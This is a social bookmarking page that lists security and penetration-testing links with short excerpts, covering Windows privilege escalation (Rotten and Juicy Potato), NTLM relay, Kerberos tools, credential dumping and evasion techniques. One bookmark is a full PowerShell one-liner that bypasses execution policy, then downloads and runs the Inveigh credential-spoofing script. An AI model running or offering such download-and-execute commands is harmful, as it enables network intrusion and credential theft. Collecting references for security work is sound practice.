whip_lash + security   592

Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
NTLM relay from the local “NT AUTHORITY\SYSTEM” (we will just call it SYSTEM for brevity) account back to some other system service has been the theme for the Potato privilege escalation exploits. The first step is to trick the SYSTEM account into performing authentication to some TCP listener we control.

In the original Hot Potato exploit, we did some complex magic with NBNS spoofing, WPAD, and Windows Update services to trick it into authenticating to us over HTTP. For more information, see the original blog post.

Today, we’ll be discussing another method to accomplish the same end goal which James Forshaw discussed here. We’ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.
security  pentest  windows  privesc  privilegeescalation 
27 days ago by whip_lash
Juicy Potato (abusing the golden privileges) | juicy-potato
If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

It’s nearly impossible to prevent the abuse of all these COM Servers. You could think to modify the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.
pentest  windows  privilegeescalation  security 
27 days ago by whip_lash
From Kekeo to Rubeus – Posts By SpecterOps Team Members
Today I’m releasing Rubeus, the start of a C# reimplementation of some (not all) of Kekeo’s functionality. I’ve wanted to dive deeper into Kerberos structures and exchanges for a while in order to better understand the entire system, and this project provided the perfect excuse to jump right in.
kerberos  activedirectory  security  pentest  tool 
27 days ago by whip_lash
FuzzySecurity | Windows Userland Persistence Fundamentals
This tutorial will cover several techniques that can be used to gain persistent access to Windows machines. Usually this doesn't enter into play during a pentest (with the exception of red team engagements) as there is no benefit to adding it to the scope of the project. That is not to say it is not an interesting subject, both from a defensive and offensive perspective.
persistence  windows  pentest  redteam  security 
4 weeks ago by whip_lash
The pitfalls of using ssh-agent, or how to use an agent safely
I probably sound like a broken record by now, but something like ssh-ident allows you to keep different keys in different agents, easily, while loading agents and keys on demand, keep your identities separated, and easily set a timeout while reloading all keys as necessary.
linux  security  ssh 
6 weeks ago by whip_lash
Script Get All AD Users Logon History with their Logged on Computers (with IPs)& OUs
This script will list the AD users logon information with their logged on computers by inspecting the Kerberos TGT Request
Events(EventID 4768) from domain controllers. Not Only User account Name is fetched, but also users OU path and Computer
Accounts are retrieved. You can also list the history of last logged on users. In Environment where Exchange Servers are
used, the exchange servers authentication request for users will also be logged since it also uses EventID (4768) to for
TGT Request. You can also export the result to CSV file format. Powershell version 3.0 is needed to use the script.
You can Define the following parameters to suite your need:
ad  security  powershell  Scripting 
7 weeks ago by whip_lash
AnonOpsecPrivacy - InfoSec Reference
Colossal InfoSec reference on every subject imaginable
security  pentest 
8 weeks ago by whip_lash
Rotten Potato | Penetration Testing Lab
However there is a technique which can be used that tries to trick the “NT Authority\System” account to negotiate and authenticate via NTLM locally so the token for the “NT Authority\System” account would become available and therefore privilege escalation possible. This technique is called Rotten Potato and it was introduced in DerbyCon 2016 by Stephen Breen and Chris Mallz.
windows  privesc  privilegeescalation  pentest  security 
9 weeks ago by whip_lash
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
oracle  database  pentest  security  tool 
9 weeks ago by whip_lash
NSA Cracked Open Encrypted Networks of Russian Airlines, Al Jazeera, and Other “High Potential” Targets
The NSA’s ability to crack into sensitive VPNs belonging to large organizations, all the way back in 2006, raises broader questions about the security of such networks. Many consumers pay for access to VPNs in order to mask the origin of their internet traffic from the sites they visit, hide their surfing habits from their internet service providers, and to protect against eavesdroppers on public Wi-Fi networks.
security  nsa  vpn 
9 weeks ago by whip_lash
Veritas® Traveller's Doorstop - Lee Valley Tools
To use it, you just slide the wedge under the door and elevate it with the screw until the door is solidly wedged. Anyone attempting entry causes the door to wedge tighter in the frame while the pointed screw keeps the wedge from shifting. The screw can be used with concrete subfloors as well as the traditional carpet-covered subfloors.

It does not damage carpeting unless there is an attempted forced entry; it then penetrates the subfloor as the pressure on the wedge increases. But then, which would you prefer, a dent in the subfloor or an unwanted visitor? The lever handle gives you substantial mechanical advantage, making it easy to turn the screw.
security  travel 
9 weeks ago by whip_lash
michenriksen/gitrob: Reconnaissance tool for GitHub organizations
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
git  github  osint  security 
10 weeks ago by whip_lash
The default OpenSSH key encryption is worse than plaintext
That’s a fair argument to say that standard password-encrypted keys are about as good as plaintext: the encryption is ineffective. But I made a stronger statement: it’s worse. The argument there is simple: an SSH key password is unlikely to be managed by a password manager: instead it’s something you remember. If you remember it, you probably reused it somewhere. Perhaps it’s even your device password.
encryption  security  ssh 
11 weeks ago by whip_lash
JSON Web Tokens - jwt.io
JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.

JWT.IO allows you to decode, verify and generate JWT.
authentication  javascript  json  security  webapp  pentest 
11 weeks ago by whip_lash
GitHub - pentestmonkey/pysecdump: Python-based tool to dump security information from Windows systems
pysecdump is a python tool to extract various credentials and secrets from running Windows systems. It currently extracts:

LM and NT hashes (SYSKEY protected)
Cached domain passwords
LSA secrets
Secrets from Credential Manager (only some)
pentest  security  tool 
11 weeks ago by whip_lash
There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of version with known vulnerabilities.
javascript  security  pentest  webapp 
12 weeks ago by whip_lash
Removing sensitive data from a repository - User Documentation
If you commit sensitive data, such as a password or SSH key into a Git repository, you can remove it from the history. To entirely remove unwanted files from a repository's history you can use either the git filter-branch command or the BFG Repo-Cleaner.
git  github  security 
12 weeks ago by whip_lash
GitHub - s0md3v/Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target.

160 requests per second while extensive data extraction is just another day for Photon!
python  security  tools  web  recon  pentest 
12 weeks ago by whip_lash
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. See the full list of functions.

This was inspired by the LOLBins project for Windows.
linux  pentesting  hacking  security  shell 
july 2018 by whip_lash
gargoyle, a memory scanning evasion technique
gargoyle is a technique for hiding all of a program’s executable code in non-executable memory. At some programmer-defined interval, gargoyle will wake up–and with some ROP trickery–mark itself executable and do some work:
security  memory  gargoyle 
july 2018 by whip_lash
hacksysteam/HackSysExtremeVulnerableDriver: HackSys Extreme Vulnerable Windows Driver
HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level.
security  windows  kernel 
july 2018 by whip_lash
clymb3r/KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, I have written this driver in the hopes that you will use this knowledge for good.
kernel  security 
july 2018 by whip_lash
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
july 2018 by whip_lash
Categorizing and Enriching Security Events in an ELK with the Help of Sysmon and ATT&CK
Thanks to the recent update to Sysmon (Version 8.0), tagging Sysmon rules is now possible, and makes things much easier to add extra metadata to Sysmon events.
sysmon  security  monitoring 
july 2018 by whip_lash
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
Pv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
july 2018 by whip_lash
Car Hacking: The definitive source
Instead of buying books or paying exorbitant amount of money to learn about car hacking, we (Charlie Miller and Chris Valasek) decided to publish all our tools, data, research notes, and papers to everyone for FREE! Feel free to reach out if you have any questions. If you're nice enough we may actually send you one of our IDBs ;)
car  hacking  security 
july 2018 by whip_lash
Netflix/security_monkey: Security Monkey
Security Monkey monitors your AWS and GCP accounts for policy changes and alerts on insecure configurations. Support is available for OpenStack public and private clouds. Security Monkey can also watch and monitor your GitHub organizations, teams, and repositories.
aws  devops  github  monitoring  security 
july 2018 by whip_lash
Hexacorn | Blog
If you run ‘powershell <0x2000 spaces> calc’ you will spawn Windows Calculator.

What will you see in the logs?


obfuscation  logging  pentest  windows  security 
june 2018 by whip_lash
Bypassing SQL Server Logon Trigger Restrictions
Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties.
database  pentest  security  mssql  MySQL  sql 
june 2018 by whip_lash
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
hash  ntlm  relay  windows  pentest  security 
june 2018 by whip_lash
SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec at http://pen-testing.sans.org/blog/2013/03/27/psexec-python-rocks) It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!
impacket  python  security  smb  relay  ntlm  hash  script  pentest 
june 2018 by whip_lash
calebmadrigal/trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.
network  python  security  wifi  wireless  pentest  github 
june 2018 by whip_lash
ufrisk/pcileech: Direct Memory Access (DMA) Attack Software
PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.

PCILeech works without hardware together with memory dump files and the Windows 7/2008R2 x64 Total Meltdown / CVE-2018-1038 vulnerability.
memory  security  github  hardware 
june 2018 by whip_lash
Homas/ioc2rpz: ioc2rpz is a place where threat intelligence meets DNS.
ioc2rpz transforms IOC feeds into response policy zones (RPZ). You can mix feeds to generate a single RPZ or multiple RPZs. Trusted domains and IPs can be whitelisted. ioc2rpz supports expiration of indicators and accordingly rebuilds zones.
dns  security  github 
june 2018 by whip_lash
Cymmetria/honeycomb: An extensible honeypot framework
Honeycomb is an open-source honeypot framework created by Cymmetria.

Honeycomb allows running honeypots with various integrations from a public library of plugins from https://github.com/Cymmetria/honeycomb_plugins

Writing new honeypot services and integrations for honeycomb is super easy! See the plugins repo for more info.
honeypot  security  github 
june 2018 by whip_lash
CHIRON is a home analytics based on ELK stack combined with Machine Learning threat detection framework AKTAION. CHIRON parses and displays data from P0f, Nmap, and BRO IDS. CHIRON is designed for home use and will give great visibility into home internet devices (IOT, Computers, Cellphones, Tablets, etc).
github  lab  security  securityonion 
june 2018 by whip_lash
sense-of-security/ADRecon: ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
security  pentest  activedirectory  github 
june 2018 by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks | SANS Institute
Favorite tweet:

SANS | #PenTest Blog

Modern Web App Pen Testing Part 2, Hash Length Extension Attacks
by @adriendb (SEC642)

Blog: https://t.co/8TR2Z7OKYu pic.twitter.com/3YA3ncesym

— SANS Pen Test (@SANSPenTest) June 28, 2018
hashextension  hash  webapp  pentest  security 
june 2018 by whip_lash
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI – Security Stuff
earning from these incidents, and the requirements inherent to them (ability to deploy tools and get data rapidly, use only built in tools, has to be usable and deployable by people who probably haven't slept in a week) I developed an Incident Response dashboard that I liked so much I personally used it to "hunt" on all the engagements in the later part of my Incident Response Consultant tenure. Many of the customers liked it so much that they have kept it in their environments to use for proactive threat hunting and log analysis.
defense  dfir  security  windows 
june 2018 by whip_lash
Microsoft COM for Windows - Privilege Escalation
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
privesc  windows  pentest  exploit  security 
june 2018 by whip_lash
Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses | McAfee Blogs
In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.
pentest  security 
june 2018 by whip_lash
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
The "executive summary" version of a Golden Ticket is that if you can obtain one of the encryption keys used by the krbtgt account for an Active Directory domain, Mimikatz 2.0 will allow you to forge arbitrary Kerberos authentication tickets for that domain. Those keys are not easily-obtained — unless someone has left an NTDS.DIT backup lying around, it probably requires access to a domain admin account's credentials — so the Golden Ticket functionality is sort of like the "New Game+" mode in the Silent Hill series: you've already won, and now you can play through again as an unstoppable juggernaut with a laser pistol and/or chainsaw.
activedirectory  mimikatz  goldenticket  pentest  security 
june 2018 by whip_lash
One-Lin3r v1.1 - Gives You One-Liners That Aids In Penetration Testing Operations - KitPloit - PenTest Tools for your Security Arsenal ☣
Favorite tweet:

#OneLin3r v1.1 - Gives You One-Liners That Aids In Penetration #Testing Operations https://t.co/AWvpLnt1ND pic.twitter.com/74zGjoV9Ve

— ☣ The Hacker Tools (@KitPloit) June 14, 2018
pentest  security  tool 
june 2018 by whip_lash
Pentester's Windows NTFS Tricks Collection | SEC Consult
Moreover, it’s possible that an administrator or a program configures such permissions and assumes that users are really not allowed to create folders in it.

This ACL can be bypassed as soon as a user can create files. Adding “::$INDEX_ALLOCATION” to the end of a filename will create a folder instead of a file and Windows currently doesn’t include a check for this corner case.

As shown above, a directory was successfully created and the user can create arbitrary files or folders in this directory (which can lead to privilege escalation if an administrator/program assumes that this is not possible because of the missing permissions).
ntfs  windows  privesc  privilegeescalation  security  whitelist-evasion 
june 2018 by whip_lash
« earlier      
per page:    204080120160

related tags

2fa  activedefense  activedirectory  ad  afghanistan  agent  aircraft  analysis  android  ansible  antivirus  api  app  apple  apps  apt  ascii  assembly  austin  authentication  aws  banking  base64  bash  bigbrother  binary  biology  bitcoin  blogs  bloodhound  board  book  books  Brazil  breach  britain  browser  bruteforce  bufferoverflow  bug  bugbounty  burp  c  c&c  c++  c2  car  career  cars  certification  cheatsheet  cheatsheets  china  cis  cisco  cissp  class  cloud  code  coldfusion  commandinjection  commandline  communications  compliance  compromise  conference  consulting  containers  conversion  courses  crackmapexec  craigslist  creepy  crime  crypto  cryptography  ctf  culture  darkweb  data  database  dcshadow  ddos  debugger  debugging  defcon  defense  deserialization  design  development  devops  dfir  diamond  dictionary  disassembler  diy  dns  docker  domain  dorks  dos  download  drive  drm  economics  education  egypt  elasticsearch  electricity  electronics  elkstack  email  encryption  engineering  espionage  ethereum  ethics  evasion  events  exchange  exfiltration  exploit  facebook  fbi  firewall  foreignpolicy  forensics  forum  fraud  free  freebsd  freeware  fuzzing  gadgets  games  gargoyle  gigs  git  github  glba  goldenticket  google  government  gps  gradschool  guide  hacking  hardening  hardware  hash  hashcat  hashes  hashextension  hex  hipaa  homebrew  honeypot  howto  hping3  html  http  https  humor  i2p  ibm  ichidan  icmp  ida  idiocracy  ids  iis  immunity  impacket  india  indicators  infraguard  injection  intel  intelligence  internet  intrusionanalysis  ios  iot  iphone  ips  ipsec  ipv6  java  javascipt  javascript  jenkins  joke  json  juniper  kali  keepass  kerberoast  kerberos  kernel  kubernetes  lab  laps  law  learning  lemons  lfi  library  linux  literature  livingofftheland  localadmin  lockpicking  logging  lolbins  lotusnotes  mac  mainframe  malware  masters  memory  merlin  messaging  metasploit  metta  mexico  mfa  microsoft  military  mimikatz  mindmap  mitm  mobile  monitoring  moonlighting  mssql  music  MySQL  netcat  netripper  networengineering  network  networking  news  nmap  nsa  ntfs  ntlm  obama  obfuscation  office  online  openbsd  opensource  opsec  oracle  oscp  osint  outlook  p2p  packetcapture  passports  Password  passwords  pcap  pdf  pentest  pentesting  persistence  pgp  phishing  php  phy  physical  pivoting  plugin  police  politics  postexploitation  postscript  powershell  privacy  privesc  privilegeescalation  privitization  programming  promiscuous  proxcard  proxy  psychology  purpleteam  python  radio  rails  recommended  recon  redis  redteam  reference  registry  relay  report  resources  responder  rest  reverseengineering  reverseshell  rfi  rmi  router  ruby  sanbox  sans  sarbanes-oxley  scanner  schneier  science  script  Scripting  sdn  sdr  search  secrecy  secure  security  securityonion  sensepost  server  services  shell  shellcode  shodan  siem  sign  signature  smb  smtp  socks  software  solaris  spam  spike  splunk  sql  sqli  ssh  ssl  ssrf  stealth  sudo  swift  sysadmin  sysinternals  sysmon  taliban  tcp  tech  technology  terrorism  testing  threatintel  tips  tool  tools  tor  torrent  training  transportation  travel  troubleshooting  tty  tutorial  tutorials  twitter  uac  ubuntu  unix  urldecode  usb  utilities  video  virtualization  vmware  voip  vpn  vulnerability  waf  war  wargames  web  webapp  webdav  webdev  webshell  whitelist-evasion  wifi  windbg  windows  wireless  wireshark  wordpress  workstation  wpad  wps  xml  xss  xxe  yara  youtube  yubikey 

Copy this bookmark: